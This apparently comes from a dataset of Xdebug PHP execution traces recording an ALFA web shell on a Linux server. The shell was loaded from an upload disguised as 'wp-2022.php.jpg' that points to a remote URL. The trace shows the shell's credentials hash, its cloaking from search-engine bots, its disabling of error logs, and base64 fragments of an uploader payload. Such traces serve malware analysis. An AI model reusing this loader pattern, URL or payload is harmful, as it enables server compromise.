5	494	0	0.068650	436136	in_array	0		/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	959	2	3	[0 => 8, 1 => 9, 2 => 10, 3 => 7, 4 => 6, 5 => 5, 6 => 4]
5	494	1	0.068668	436208
5	494	R			FALSE
5	495	0	0.068681	436136	in_array	0		/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	959	2	4	[0 => 8, 1 => 9, 2 => 10, 3 => 7, 4 => 6, 5 => 5, 6 => 4]
5	495	1	0.068697	436208
5	495	R			TRUE
5	496	0	0.068710	436136	in_array	0		/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	959	2	5	[0 => 8, 1 => 9, 2 => 10, 3 => 7, 4 => 6, 5 => 5, 6 => 4]
5	496	1	0.068724	436208
5	496	R			TRUE
5	497	0	0.068737	436136	in_array	0		/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	959	2	6	[0 => 8, 1 => 9, 2 => 10, 3 => 7, 4 => 6, 5 => 5, 6 => 4]
5	497	1	0.068751	436208
5	497	R			TRUE
5	498	0	0.068764	436136	in_array	0		/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	959	2	7	[0 => 8, 1 => 9, 2 => 10, 3 => 7, 4 => 6, 5 => 5, 6 => 4]
5	498	1	0.068778	436208
5	498	R			TRUE
5	499	0	0.068790	436136	in_array	0		/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	959	2	8	[0 => 8, 1 => 9, 2 => 10, 3 => 7, 4 => 6, 5 => 5, 6 => 4]
5	499	1	0.068804	436208
5	499	R			TRUE
5	500	0	0.068816	436136	in_array	0		/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	959	2	9	[0 => 8, 1 => 9, 2 => 10, 3 => 7, 4 => 6, 5 => 5, 6 => 4]
5	500	1	0.068831	436208
5	500	R			TRUE
5	501	0	0.068844	436136	in_array	0		/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	959	2	10	[0 => 8, 1 => 9, 2 => 10, 3 => 7, 4 => 6, 5 => 5, 6 => 4]
5	501	1	0.068857	436208
5	501	R			TRUE
4	491	1	0.068871	434688
4	502	0	0.068880	434688	alfafooter	1		/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	2563	0
5	503	0	0.068894	434688	htmlspecialchars	0		/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	2293	1	'/var/www/html/uploads/'
5	503	1	0.068910	434880
5	503	R			'/var/www/html/uploads/'
5	504	0	0.068928	437760	date	0		/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	2306	1	'Y'
5	504	1	0.068963	438048
5	504	R			'2023'
4	502	1	0.070720	451072
3	64	1	0.070734	451072
			0.070782	328464
TRACE END   [2023-02-13 00:10:30.456404]

data/traces/0eebffcade2a2a9076837f7425362205_trace-1676261760.4182.xt
Version: 3.1.0beta2
File format: 4
TRACE START [2023-02-13 02:16:26.315997]
1	0	1	0.000157	393576
1	3	0	0.000272	399848	{main}	1		/var/www/html/uploads/wp-2022.php.jpg	0	0
2	4	0	0.000300	400224	md5	0		/var/www/html/uploads/wp-2022.php.jpg	2	1	'localhost'
2	4	1	0.000316	400320
2	4	R			'421aa90e079fa326b6494f812ad13e79'
1		A						/var/www/html/uploads/wp-2022.php.jpg	2	$data = [0 => 'https://shell.prinsh.com/Nathan/alfa.txt', 1 => '/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php']
2	5	0	0.000351	400304	file_exists	0		/var/www/html/uploads/wp-2022.php.jpg	4	1	'/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php'
2	5	1	0.000373	400344
2	5	R			TRUE
2	6	0	0.000387	400304	filesize	0		/var/www/html/uploads/wp-2022.php.jpg	4	1	'/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php'
2	6	1	0.000405	400392
2	6	R			463792
2	7	0	0.000466	402728	include	1	/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	/var/www/html/uploads/wp-2022.php.jpg	5	0
2		A						/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	9	GLOBALS['oZgNypoPRU'] = ['username' => 'alfa', 'password' => 'a6f452ec3293d7fb72c5b677257b20ec', 'safe_mode' => '0', 'login_page' => '403', 'show_icons' => '1', 'post_encryption' => FALSE, 'cgi_api' => TRUE]
2		A						/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	19	$CWppUDJxuf = 'function_exists'
2		A						/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	20	$aztJtafUXm = 'charCodeAt'
2		A						/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	21	$OVpGNqqFZs = 'eval'
2		A						/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	22	$psDEwGhsxg = 'gzinflate'
3	8	0	0.000559	402728	function_exists	0		/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	24	1	'base64_encode'
3	8	1	0.000573	402768
3	8	R			TRUE
3	9	0	0.000587	402728	function_exists	0		/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	72	1	'base64_decode'
3	9	1	0.000600	402768
3	9	R			TRUE
2		A						/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	126	GLOBALS['DB_NAME'] = ['username' => 'alfa', 'password' => 'a6f452ec3293d7fb72c5b677257b20ec', 'safe_mode' => '0', 'login_page' => '403', 'show_icons' => '1', 'post_encryption' => FALSE, 'cgi_api' => TRUE]
2		A						/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	128	$key = 'username'
3	10	0	0.000648	402704	substr	0		/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	130	3	'username'	0	2
3	10	1	0.000663	402832
3	10	R			'us'
2		A						/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	130	$prefix = 'us'
2		A						/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	133	GLOBALS['DB_NAME']['user'] = 'alfa'
2		A						/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	134	GLOBALS['DB_NAME']['user_rand'] = 'username'
2		A						/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	128	$key = 'password'
3	11	0	0.000726	403432	substr	0		/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	130	3	'password'	0	2
3	11	1	0.000740	403560
3	11	R			'pa'
2		A						/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	130	$prefix = 'pa'
2		A						/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	138	GLOBALS['DB_NAME']['pass'] = 'a6f452ec3293d7fb72c5b677257b20ec'
2		A						/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	139	GLOBALS['DB_NAME']['pass_rand'] = 'password'
2		A						/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	128	$key = 'safe_mode'
3	12	0	0.000803	403432	substr	0		/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	130	3	'safe_mode'	0	2
3	12	1	0.000816	403560
3	12	R			'sa'
2		A						/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	130	$prefix = 'sa'
2		A						/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	143	GLOBALS['DB_NAME']['safemode'] = '0'
2		A						/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	144	GLOBALS['DB_NAME']['safemode_rand'] = 'safe_mode'
2		A						/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	128	$key = 'login_page'
3	13	0	0.000876	403432	substr	0		/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	130	3	'login_page'	0	2
3	13	1	0.000890	403560
3	13	R			'lo'
2		A						/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	130	$prefix = 'lo'
2		A						/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	148	GLOBALS['DB_NAME']['login_page'] = '403'
2		A						/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	149	GLOBALS['DB_NAME']['login_page_rand'] = 'login_page'
2		A						/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	128	$key = 'show_icons'
3	14	0	0.000958	403432	substr	0		/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	130	3	'show_icons'	0	2
3	14	1	0.000972	403560
3	14	R			'sh'
2		A						/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	130	$prefix = 'sh'
2		A						/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	153	GLOBALS['DB_NAME']['show_icons'] = '1'
2		A						/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	154	GLOBALS['DB_NAME']['show_icons_rand'] = 'show_icons'
2		A						/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	128	$key = 'post_encryption'
3	15	0	0.001034	403432	substr	0		/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	130	3	'post_encryption'	0	2
3	15	1	0.001048	403560
3	15	R			'po'
2		A						/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	130	$prefix = 'po'
2		A						/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	158	GLOBALS['DB_NAME']['post_encryption'] = FALSE
2		A						/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	159	GLOBALS['DB_NAME']['post_encryption_rand'] = 'post_encryption'
2		A						/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	128	$key = 'cgi_api'
3	16	0	0.001110	403432	substr	0		/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	130	3	'cgi_api'	0	2
3	16	1	0.001124	403560
3	16	R			'cg'
2		A						/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	130	$prefix = 'cg'
2		A						/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	163	GLOBALS['DB_NAME']['cgi_api'] = TRUE
2		A						/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	164	GLOBALS['DB_NAME']['cgi_api_rand'] = 'cgi_api'
2		A						/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	172	$userAgents = [0 => 'Google', 1 => 'Slurp', 2 => 'MSNBot', 3 => 'ia_archiver', 4 => 'Yandex', 5 => 'Rambler', 6 => 'bot', 7 => 'spider']
3	17	0	0.001196	404072	implode	0		/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	172	2	'|'	[0 => 'Google', 1 => 'Slurp', 2 => 'MSNBot', 3 => 'ia_archiver', 4 => 'Yandex', 5 => 'Rambler', 6 => 'bot', 7 => 'spider']
3	17	1	0.001217	404232
3	17	R			'Google|Slurp|MSNBot|ia_archiver|Yandex|Rambler|bot|spider'
3	18	0	0.001236	404168	preg_match	0		/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	172	2	'/Google|Slurp|MSNBot|ia_archiver|Yandex|Rambler|bot|spider/i'	'python-requests/2.25.1'
3	18	1	0.001255	404232
3	18	R			0
3	19	0	0.001269	404072	define	0		/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	179	2	'__ALFA_VERSION__'	'4.1'
3	19	1	0.001284	404176
3	19	R			TRUE
3	20	0	0.001297	404104	define	0		/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	180	2	'__ALFA_UPDATE__'	'2'
3	20	1	0.001311	404208
3	20	R			TRUE
3	21	0	0.001323	404136	define	0		/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	181	2	'__ALFA_CODE_NAME__'	'Tesla'
3	21	1	0.001338	404240
3	21	R			TRUE
3	22	0	0.001350	404168	define	0		/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	182	2	'__ALFA_DATA_FOLDER__'	'ALFA_DATA'
3	22	1	0.001365	404272
3	22	R			TRUE
3	23	0	0.001378	404200	define	0		/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	183	2	'__ALFA_POST_ENCRYPTION__'	FALSE
3	23	1	0.001393	404304
3	23	R			TRUE
3	24	0	0.001405	404232	define	0		/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	184	2	'__ALFA_SECRET_KEY__'	''
3	24	1	0.001420	404336
3	24	R			TRUE
2		A						/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	185	GLOBALS['__ALFA_COLOR__'] = ['shell_border' => ['key_color' => '#0E304A', 'multi_selector' => [...]], 'header_vars' => '#27979B', 'header_values' => '#67ABDF', 'header_on' => '#00FF00', 'header_off' => '#ff0000', 'header_none' => '#00FF00', 'home_shell' => '#ff0000', 'home_shell:hover' => ['key_color' => '#FFFFFF', 'multi_selector' => [...]], 'back_shell' => '#efbe73', 'back_shell:hover' => ['key_color' => '#FFFFFF', 'multi_selector' => [...]], 'header_pwd' => '#00FF00', 'header_pwd:hover' => ['key_color' => '#FFFFFF', 'multi_selector' => [...]], 'header_drive' => '#00FF00', 'header_drive:hover' => ['key_color' => '#FFFFFF', 'multi_selector' => [...]], 'header_show_all' => '#00FF00', 'disable_functions' => '#ff0000', 'footer_text' => '#27979B', 'menu_options' => '#27979B', 'menu_options:hover' => ['key_color' => '#646464', 'multi_selector' => [...]], 'options_list' => ['key_color' => '#00FF00', 'multi_selector' => [...]], 'options_list:hover' => ['key_color' => '#FFFFFF', 'multi_selector' => [...]], 'options_list_header' => ['key_color' => '#59cc33', 'multi_selector' => [...]], 'options_list_text' => ['key_color' => '#FFFFFF', 'multi_selector' => [...]], 'Alfa+' => ['key_color' => '#06ff0f', 'multi_selector' => [...]], 'hidden_shell_text' => ['key_color' => '#00FF00', 'multi_selector' => [...]], 'hidden_shell_version' => '#ff0000', 'shell_name' => '#FF0000', 'main_row:hover' => ['key_color' => '#646464', 'multi_selector' => [...]], 'main_header' => ['key_color' => '#FFFFFF', 'multi_selector' => [...]], 'main_name' => ['key_color' => '#FFFFFF', 'multi_selector' => [...]], 'main_size' => '#67ABDF', 'main_modify' => '#67ABDF', 'main_owner_group' => '#67ABDF', 'main_green_perm' => '#25ff00', 'main_red_perm' => '#FF0000', 'main_white_perm' => '#FFFFFF', 'beetween_perms' => '#FFFFFF', 'main_actions' => ['key_color' => '#FFFFFF', 'multi_selector' => [...]], 'minimize_editor_background' => ['key_color' => '#0e304a', 'multi_selector' => [...]], 'minimize_editor_text' => ['key_color' => '#f5deb3', 'multi_selector' => [...]], 'editor_border' => ['key_color' => '#0e304a', 'multi_selector' => [...]], 'editor_background' => ['key_color' => 'rgba(0, 1, 23, 0.94)', 'multi_selector' => [...]], 'editor_header_background' => ['key_color' => 'rgba(21, 66, 88, 0.93)', 'multi_selector' => [...]], 'editor_header_text' => ['key_color' => '#00ff7f', 'multi_selector' => [...]], 'editor_header_button' => ['key_color' => '#1d5673', 'multi_selector' => [...]], 'editor_actions' => ['key_color' => '#FFFFFF', 'multi_selector' => [...]], 'editor_file_info_vars' => ['key_color' => '#FFFFFF', 'multi_selector' => [...]], 'editor_file_info_values' => ['key_color' => '#67ABDF', 'multi_selector' => [...]], 'editor_history_header' => ['key_color' => '#14ff07', 'multi_selector' => [...]], 'editor_history_list' => ['key_color' => '#03b3a3', 'multi_selector' => [...]], 'editor_history_selected_file' => ['key_color' => 'rgba(49, 55, 93, 0.77)', 'multi_selector' => [...]], 'editor_history_file:hover' => ['key_color' => '#646464', 'multi_selector' => [...]], 'input_box_border' => ['key_color' => '#0E304A', 'multi_selector' => [...]], 'input_box_text' => ['key_color' => '#999999', 'multi_selector' => [...]], 'input_box:hover' => ['key_color' => '#27979B', 'multi_selector' => [...]], 'select_box_border' => ['key_color' => '#0E304A', 'multi_selector' => [...]], 'select_box_text' => ['key_color' => '#FFFFEE', 'multi_selector' => [...]], 'select_box:hover' => ['key_color' => '#27979B', 'multi_selector' => [...]], 'button_border' => ['key_color' => '#27979B', 'multi_selector' => [...]], 'button:hover' => ['key_color' => '#27979B', 'multi_selector' => [...]], 'outputs_text' => ['key_color' => '#67ABDF', 'multi_selector' => [...]], 'outputs_border' => ['key_color' => '#0E304A', 'multi_selector' => [...]], 'uploader_border' => ['key_color' => '#0E304A', 'multi_selector' => [...]], 'uploader_background' => ['key_color' => '#0E304A', 'multi_selector' => [...]], 'uploader_text_right' => ['key_color' => '#FFFFFF', 'multi_selector' => [...]], 'uploader_text_left' => ['key_color' => '#25ff00', 'multi_selector' => [...]], 'uploader:hover' => ['key_color' => '#27979B', 'multi_selector' => [...]], 'uploader_progress_bar' => ['key_color' => '#00ff00', 'multi_selector' => [...]], 'mysql_tables' => '#00FF00', 'mysql_table_count' => '#67ABDF', 'copyright' => '#dfff00', 'scrollbar' => ['key_color' => '#1e82b5', 'multi_selector' => [...]], 'scrollbar_background' => ['key_color' => '#000115', 'multi_selector' => [...]]]
3	25	0	0.001556	404264	preg_replace	0		/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	511	3	'!\\(\\d+\\)\\s.*!'	''	'/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php'
3	25	1	0.001578	404360
3	25	R			'/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php'
3	26	0	0.001595	404264	trim	0		/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	511	1	'/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php'
3	26	1	0.001608	404296
3	26	R			'/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php'
3	27	0	0.001623	404264	str_replace	0		/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	511	3	'\\'	'/'	'/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php'
3	27	1	0.001639	404360
3	27	R			'/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php'
2		A						/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	511	GLOBALS['__file_path'] = '/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php'
2		A						/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	512	$config = ['AlfaUser' => 'alfa', 'AlfaPass' => 'a6f452ec3293d7fb72c5b677257b20ec', 'AlfaProtectShell' => '0', 'AlfaLoginPage' => '403']
3	28	0	0.001687	404640	session_write_close	0		/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	514	0
3	28	1	0.001700	404640
3	28	R			FALSE
3	29	0	0.001714	404640	ignore_user_abort	0		/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	515	1	TRUE
3	29	1	0.001728	404704
3	29	R			0
3	30	0	0.001740	404672	set_time_limit	0		/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	516	1	0
3	30	1	0.001755	404736
3	30	R			FALSE
3	31	0	0.001768	404704	ini_set	0		/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	517	2	'memory_limit'	'-1'
3	31	1	0.001783	404808
3	31	R			'128M'
3	32	0	0.001795	404704	ini_set	0		/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	518	2	'upload_max_filesize'	'9999m'
3	32	1	0.001809	404776
3	32	R			FALSE
3	33	0	0.001824	404704	error_reporting	0		/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	853	1	32759
3	33	1	0.001837	404776
3	33	R			0
3	34	0	0.001849	404736	ini_set	0		/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	854	2	'error_log'	NULL
3	34	1	0.001863	404808
3	34	R			''
3	35	0	0.001876	404736	ini_set	0		/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	855	2	'log_errors'	0
3	35	1	0.001890	404808
3	35	R			'1'
3	36	0	0.001902	404736	ini_set	0		/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	856	2	'max_execution_time'	0
3	36	1	0.001916	404776
3	36	R			'0'
3	37	0	0.001928	404704	ini_set	0		/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	857	2	'magic_quotes_runtime'	0
3	37	1	0.001941	404776
3	37	R			FALSE
3	38	0	0.001954	404704	set_time_limit	0		/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	858	1	0
3	38	1	0.001966	404768
3	38	R			FALSE
3	39	0	0.001979	404736	function_exists	0		/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	859	1	'set_magic_quotes_runtime'
3	39	1	0.001992	404776
3	39	R			FALSE
2		A						/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	875	$default_action = 'FilesMan2'
2		A						/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	876	$default_use_ajax = TRUE
2		A						/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	877	$default_charset = 'Windows-1251'
3	40	0	0.002039	404736	substr	0		/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	878	3	'Linux'	0	3
3	40	1	0.002053	404864
3	40	R			'Lin'
3	41	0	0.002066	404768	strtolower	0		/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	878	1	'Lin'
3	41	1	0.002079	404832
3	41	R			'lin'
2		A						/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	881	GLOBALS['sys'] = 'unix'
3	42	0	0.002106	404736	alfaGetCwd	1		/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	882	0
4	43	0	0.002118	404736	function_exists	0		/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	737	1	'getcwd'
4	43	1	0.002131	404776
4	43	R			TRUE
4	44	0	0.002144	404736	getcwd	0		/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	738	0
4	44	1	0.002157	404784
4	44	R			'/var/www/html/uploads'
3	42	1	0.002171	404784
3	42	R			'/var/www/html/uploads'
2		A						/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	882	GLOBALS['home_cwd'] = '/var/www/html/uploads'
2		A						/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	883	GLOBALS['need_to_update_header'] = 'false'
2		A						/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	884	GLOBALS['glob_chdir_false'] = FALSE
3	45	0	0.002225	404784	alfaGetCwd	1		/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	890	0
4	46	0	0.002237	404784	function_exists	0		/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	737	1	'getcwd'
4	46	1	0.002254	404824
4	46	R			TRUE
4	47	0	0.002267	404784	getcwd	0		/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	738	0
4	47	1	0.002279	404832
4	47	R			'/var/www/html/uploads'
3	45	1	0.002293	404832
3	45	R			'/var/www/html/uploads'
2		A						/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	890	GLOBALS['cwd'] = '/var/www/html/uploads'
2		A						/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	898	['cwd'] .= '/'
3	48	0	0.002333	404832	function_exists	0		/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	899	1	'sys_get_temp_dir'
3	48	1	0.002347	404872
3	48	R			TRUE
3	49	0	0.002359	404832	function_exists	0		/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	900	1	'mb_strlen'
3	49	1	0.002372	404872
3	49	R			FALSE
3	50	0	0.002385	404832	function_exists	0		/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	905	1	'mb_substr'
3	50	1	0.002398	404872
3	50	R			FALSE
3	51	0	0.002411	404832	function_exists	0		/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	910	1	'sys_get_temp_dir'
3	51	1	0.002424	404872
3	51	R			TRUE
3	52	0	0.002436	404832	sys_get_temp_dir	0		/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	910	0
3	52	1	0.002449	404872
3	52	R			'/tmp'
3	53	0	0.002462	404872	str_replace	0		/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	910	3	'\\'	'/'	'/tmp'
3	53	1	0.002476	404968
3	53	R			'/tmp'
3	54	0	0.002489	404872	is_writable	0		/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	910	1	'/tmp'
3	54	1	0.002506	404912
3	54	R			TRUE
3	55	0	0.002519	404840	sys_get_temp_dir	0		/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	910	0
3	55	1	0.002531	404872
3	55	R			'/tmp'
3	56	0	0.002543	404872	define	0		/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	910	2	'ALFA_TEMPDIR'	'/tmp'
3	56	1	0.002558	404976
3	56	R			TRUE
3	57	0	0.002573	404904	function_exists	0		/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	2399	1	'posix_getpwuid'
3	57	1	0.002587	404944
3	57	R			TRUE
3	58	0	0.002599	404904	function_exists	0		/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	2401	1	'posix_getgrgid'
3	58	1	0.002612	404944
3	58	R			TRUE
3	59	0	0.002624	404904	function_exists	0		/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	2459	1	'scandir'
3	59	1	0.002637	404944
3	59	R			TRUE
3	60	0	0.002653	404904	function_exists	0		/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	6162	1	'json_encode'
3	60	1	0.002667	404944
3	60	R			TRUE
3	61	0	0.002679	404904	function_exists	0		/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	6204	1	'json_decode'
3	61	1	0.002692	404944
3	61	R			TRUE
3	62	0	0.002704	404944	function_exists	0		/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	6520	1	'alfaFilesMan2'
3	62	1	0.002717	404984
3	62	R			TRUE
2		A						/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	6521	_POST['a'] = 'FilesMan2'
3	63	0	0.002751	405320	function_exists	0		/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	6524	1	'alfaFilesMan2'
3	63	1	0.002765	405360
3	63	R			TRUE
3	64	0	0.002779	405280	alfaFilesMan2	1		/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	6525	0
4	65	0	0.002796	405280	alfahead	1		/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	2560	0
4		A						/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	912	GLOBALS['__ALFA_SHELL_CODE'] = 'PD9waHAgZWNobyAiPHRpdGxlPlNvbGV2aXNpYmxlIFVwbG9hZGVyPC90aXRsZT5cbjxib2R5IGJnY29sb3I9IzAwMDAwMD5cbjxicj5cbjxjZW50ZXI+PGZvbnQgY29sb3I9XCJ3aGl0ZVwiPjxiPllvdXIgSXAgQWRkcmVzcyBpczwvYj4gPGZvbnQgY29sb3I9XCJ3aGl0ZVwiPjwvZm9udD48L2NlbnRlcj5cbjxiaWc+PGZvbnQgY29sb3I9XCIjN0NGQzAwXCI+PGNlbnRlcj5cbiI7ZWNobyAkX1NFUlZFUlsnUkVNT1RFX0FERFInXTtlY2hvICI8L2NlbnRlcj48L2ZvbnQ+PC9hPjxmb250IGNvbG9yPVwiIzdDRkMwMFwiPlxuPGJyPlxuPGJyPlxuPGNlbnRlcj48Zm9udCBjb2xvcj1cIiM3Q0ZDMDBcIj48YmlnPlNvbGV2aXNpYmxlIFVwbG9hZCBBcmVhPC9iaWc+PC9mb250Pjwv'
5	66	0	0.002842	407072	__ZW5jb2Rlcg	1		/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	914	1	'$x = base64_decode("PD9waHAgZWNobyAiPHRpdGxlPlNvbGV2aXNpYmxlIFVwbG9hZGVyPC90aXRsZT5cbjxib2R5IGJnY29sb3I9IzAwMDAwMD5cbjxicj5cbjxjZW50ZXI+PGZvbnQgY29sb3I9XCJ3aGl0ZVwiPjxiPllvdXIgSXAgQWRkcmVzcyBpczwvYj4gPGZvbnQgY29sb3I9XCJ3aGl0ZVwiPjwvZm9udD48L2NlbnRlcj5cbjxiaWc+PGZvbnQgY29sb3I9XCIjN0NGQzAwXCI+PGNlbnRlcj5cbiI7ZWNobyAkX1NFUlZFUlsnUkVNT1RFX0FERFInXTtlY2hvICI8L2NlbnRlcj48L2ZvbnQ+PC9hPjxmb250IGNvbG9yPVwiIzdDRkMwMFwiPlxuPGJyPlxuPGJyPlxuPGNlbnRlcj48Zm9udCBjb2xvcj1cIiM3Q0ZDMDBcIj48YmlnPlNvbGV2aXNpYmxlIFVwbG9hZCBBcmVh'
6	67	0	0.002872	407072	vcnvSCZgBz	1		/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	119	1	'$x = base64_decode("PD9waHAgZWNobyAiPHRpdGxlPlNvbGV2aXNpYmxlIFVwbG9hZGVyPC90aXRsZT5cbjxib2R5IGJnY29sb3I9IzAwMDAwMD5cbjxicj5cbjxjZW50ZXI+PGZvbnQgY29sb3I9XCJ3aGl0ZVwiPjxiPllvdXIgSXAgQWRkcmVzcyBpczwvYj4gPGZvbnQgY29sb3I9XCJ3aGl0ZVwiPjwvZm9udD48L2NlbnRlcj5cbjxiaWc+PGZvbnQgY29sb3I9XCIjN0NGQzAwXCI+PGNlbnRlcj5cbiI7ZWNobyAkX1NFUlZFUlsnUkVNT1RFX0FERFInXTtlY2hvICI8L2NlbnRlcj48L2ZvbnQ+PC9hPjxmb250IGNvbG9yPVwiIzdDRkMwMFwiPlxuPGJyPlxuPGJyPlxuPGNlbnRlcj48Zm9udCBjb2xvcj1cIiM3Q0ZDMDBcIj48YmlnPlNvbGV2aXNpYmxlIFVwbG9hZCBBcmVh'
